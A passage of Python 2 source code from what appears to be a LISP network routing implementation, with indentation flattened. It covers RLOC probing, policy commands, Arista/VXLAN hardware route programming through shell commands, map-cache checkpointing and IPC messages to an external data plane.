d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr= red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reisntall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if RTR address is in LISP the lisp-itr process learned from the
# map-server.
#
if (lisp_rtr_list.has_key(rtr_str) == False): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_addr, source, port, nonce, hop_count,
ttl):
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc_addr.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
if (pl.has_key(addr) == False):
addr = source_addr
if (pl.has_key(addr) == False):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}".format(probe,
red(map_reply_addr, False), red(source_addr, False)))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr and rloc.translated_port != 0 and
rloc.translated_port != port): continue
rloc.process_rloc_probe_reply(nonce, eid, group, hop_count, ttl)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endif
return(count)
#endif
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (lisp_nonce_echo_list.has_key(rloc_str)):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = ""
while(packet[0:1] != "\0"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name)
#enddef
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of [datetime, lisp_packet]. This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in kv_pair.keys():
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = commands.getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = commands.getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = commands.getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = commands.getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = commands.getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address an associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configure with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(rloc_octets[1]).zfill(2)
octet2 = lisp_hex_string(rloc_octets[2]).zfill(2)
octet3 = lisp_hex_string(rloc_octets[3]).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulated with a source-port of 4341
# and a destination adddress and port that was translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format. Store encryption key.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsualted packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
